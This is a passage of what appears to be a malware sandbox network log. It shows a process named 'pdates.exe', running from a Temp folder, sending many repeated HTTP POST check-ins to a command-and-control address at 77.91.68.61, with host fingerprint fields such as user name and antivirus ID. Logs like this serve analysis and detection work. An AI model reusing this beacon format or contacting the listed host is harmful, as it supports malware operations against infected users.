Jul 27, 2023 01:35:49.166542053 CEST	5773	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:49.216916084 CEST	5774	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
628	192.168.2.5	50350	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:49.383153915 CEST	5774	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:49.430820942 CEST	5774	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
629	192.168.2.5	50351	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:49.585645914 CEST	5775	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:49.634727001 CEST	5775	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.5	49780	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:20.509303093 CEST	2907	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:20.557251930 CEST	2908	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
630	192.168.2.5	50352	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:49.787822008 CEST	5776	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:49.837008953 CEST	5776	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
631	192.168.2.5	50353	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:50.042759895 CEST	5777	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:50.104644060 CEST	5777	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
632	192.168.2.5	50354	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:50.256047964 CEST	5778	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:50.306216002 CEST	5778	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
633	192.168.2.5	50355	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:50.459857941 CEST	5779	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:50.508991957 CEST	5779	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
634	192.168.2.5	50356	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:50.705722094 CEST	5780	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:50.756253958 CEST	5780	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
635	192.168.2.5	50357	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:50.913325071 CEST	5781	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:50.962451935 CEST	5781	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
636	192.168.2.5	50358	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:51.128406048 CEST	5782	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:51.179229975 CEST	5782	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
637	192.168.2.5	50359	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:51.344248056 CEST	5783	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:51.393647909 CEST	5783	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
638	192.168.2.5	50360	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:51.552421093 CEST	5784	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:51.603899956 CEST	5784	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
639	192.168.2.5	50361	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:51.760153055 CEST	5785	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:51.807578087 CEST	5785	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.5	49781	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:20.723074913 CEST	2908	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:20.773479939 CEST	2909	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
640	192.168.2.5	50362	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:51.963279009 CEST	5786	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:52.011533976 CEST	5786	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
641	192.168.2.5	50363	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:52.166541100 CEST	5787	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:52.217084885 CEST	5787	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
642	192.168.2.5	50364	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:52.386046886 CEST	5788	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:52.435285091 CEST	5788	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
643	192.168.2.5	50365	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:52.602616072 CEST	5788	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:52.651246071 CEST	5789	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
644	192.168.2.5	50366	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:52.814784050 CEST	5789	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:52.863929033 CEST	5790	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
645	192.168.2.5	50367	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:53.038717985 CEST	5790	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:53.088589907 CEST	5791	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
646	192.168.2.5	50368	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:53.246309042 CEST	5791	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:53.294157982 CEST	5792	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
647	192.168.2.5	50369	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:53.487391949 CEST	5792	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:53.535289049 CEST	5793	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
648	192.168.2.5	50370	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
